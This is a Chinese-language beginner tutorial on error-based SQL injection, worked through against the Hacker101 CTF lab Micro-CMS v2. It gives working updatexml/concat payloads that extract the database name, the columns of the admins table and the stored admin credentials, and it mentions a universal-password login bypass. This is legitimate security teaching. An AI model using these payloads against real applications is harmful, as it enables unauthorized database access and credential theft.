SQL注入之报错注入

Posted 陆吾安全攻防实验室

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了SQL注入之报错注入相关的知识,希望对你有一定的参考价值。

本文是Web安全入门系列的第3篇文章


01

UNION注入不是万能的


首先介绍一个线上靶场hacker101,网址:https://ctf.hacker101.com/。今天要用到的是名为Micro-CMS v2的例子


第一步定位注入点,找到登录页面,尝试输入用户名admin,密码admin,观察到返回信息为:Unknown user

SQL注入之报错注入

用户名输入单引号,进入报错页面

SQL注入之报错注入信息量有点大,暴露了数据库类型(MariaDB,MariaDB跟mysql在绝大多数方面是兼容的),开发语言(Python),用户表名(admins),以及查询登录密码的整个SQL查询语句

SQL注入之报错注入

输入' or '1'='1绕过对用户名的判断,返回信息为:Invalid password

SQL注入之报错注入

这个例子和上一篇UNION注入有一个显著区别:无法通过页面返回信息拿到SQL注入的结果

仅仅使用UNION注入的话,无论怎么输入,只会有三种返回结果:

  1. 返回Unknown user

  2. 返回Invalid password

  3. 进入报错页面

SQL注入之报错注入


02

什么是报错注入?

什么是报错注入?

顾名思义,就是利用报错信息来回显注入结果。

怎么注入?

利用concat函数执行注入。concat函数是MySQL的字符串连接函数

SQL注入之报错注入

select concat('m','y','s','q','l') 

SQL注入之报错注入

如果把SQL语句放在concat呢?concat中的SQL语句会被执行,这是报错注入的精华所在~

select concat((select last_name from users limit 0,1))

SQL注入之报错注入

怎么报错?

利用updatexml函数返回报错信息,关于该函数的介绍

SQL注入之报错注入

SQL注入之报错注入

select updatexml(0,concat(0x7e,(select user()) ,0x7e)  ,0)

SQL注入之报错注入

因此,报错注入思路就是:利用concat函数执行SQL注入语句,再利用updatexml函数的报错信息返回执行结果

SQL注入之报错注入


03

实战


SQL注入之报错注入

获取数据库名称

用户名输入:' or (select updatexml(0,concat(0x7e,(select database()) ,0x7e),0))#

最后执行的SQL语句变为:

SELECT password FROM admins WHERE username='' OR (SELECT updatexml(0,concat(0x7e,(SELECT database()) ,0x7e),0))#

进入报错页面,并在报错信息中显示当前数据名称level2:

SQL注入之报错注入

获取admins表字段名

' or (SELECT updatexml(0,concat(0x7e,(SELECT group_concat(column_name) FROM information_schema.columns WHERE table_name='admins') ,0x7e),0))#

SQL注入之报错注入

表数据查询

根据id依次查询admins表中的用户名和密码:

' or (SELECT updatexml(0,concat(0x7e,(SELECT group_concat(username,0x7e,password) FROM admins WHERE id=1),0x7e),0))#

SQL注入之报错注入

表中只有一条数据,返回登录页面用melida/peggie登录,登录成功~

concat和updatexml的组合只是报错注入的一种思路,对于其他类型的数据库,只要找到与这两个函数功能类似的函数就可以了!


最后,针对这个登录页面,其实有更好的SQL注入方法,那就是万能密码:

SQL注入之报错注入

SQL注入之报错注入

使用万能密码不需要知道用户名和密码也能登录~


本期内容就到这里了,下篇文章我们将介绍另一种注入类型:盲注,期待下期再见~

(部分图片源自网络,侵删)

以上是关于SQL注入之报错注入的主要内容,如果未能解决你的问题,请参考以下文章

SQL注入之报错注入

sql盲注之报错注入(附自动化脚本)

bypass 之报错注入

DAY3:SQL注入2

以下代码片段是不是容易受到 Rails 5 中 SQL 注入的影响?

安全测试 web安全测试 常规安全漏洞 可能存在SQL和JS注入漏洞场景分析。为什么自己没有找到漏洞,哪么可能存在漏洞场景是?SQL注入漏洞修复 JS注入漏洞修复 漏洞存在场景分析和修复示例(代码片段